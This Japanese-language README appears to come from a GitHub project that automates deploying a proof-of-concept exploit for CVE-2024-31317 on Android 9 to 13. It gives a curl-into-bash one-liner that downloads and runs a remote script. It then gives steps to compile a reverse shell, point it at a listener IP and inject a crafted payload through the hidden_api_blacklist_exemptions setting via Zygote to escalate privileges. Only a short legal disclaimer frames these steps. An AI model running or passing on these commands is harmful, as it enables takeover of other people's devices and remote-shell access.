
Android 9-13 向け CVE-2024-31317 PoC の自動デプロイツール。Zygote インジェクションとリバースシェル実行を通じた権限昇格を可能にします。
Android 9 から 13 のデバイスを対象とした CVE-2024-31317 概念実証エクスプロイトのデプロイツールです。
CVE-2024-31317-PoC-Deployer は、CVE-2024-31317 の脆弱性を悪用するために必要なすべてのファイルをすばやく生成・設定する自動化デプロイスクリプトです。この脆弱性は Android 9 から 13 のデバイスに影響し、Zygote プロセスを介した権限昇格と任意のコード実行を可能にします。
reverse_shell.c - C言語で実装されたリバースシェルプログラムpayload.txt - 特別に細工されたエクスプロイトペイロードcompile.sh - 自動コンパイルスクリプトREADME.txt - 詳細な使用説明CVE-2024-31317.txt - 脆弱性の技術分析ドキュメントリモートデプロイスクリプトを実行する:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
リバースシェルをコンパイルする:
sh compile.sh
リバースシェルリスナーを実行する:
sh reverse_shell
payload.txt をターゲットデバイスの /data/local/tmp/ にアップロードするxxx.xxx.xxx を自分のリスナーサーバーのIPアドレスに置き換えるam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
このツールは、合法的なセキュリティテストおよび研究目的でのみ使用してください。使用前にターゲットシステムの明確な承認を得る必要があります。無断使用は法律違反となる可能性があります。開発者はいかなる不正使用に対しても責任を負いません。
このプロジェクトは MIT ライセンスの下で提供されています。詳細は LICENSE ファイルを参照してください。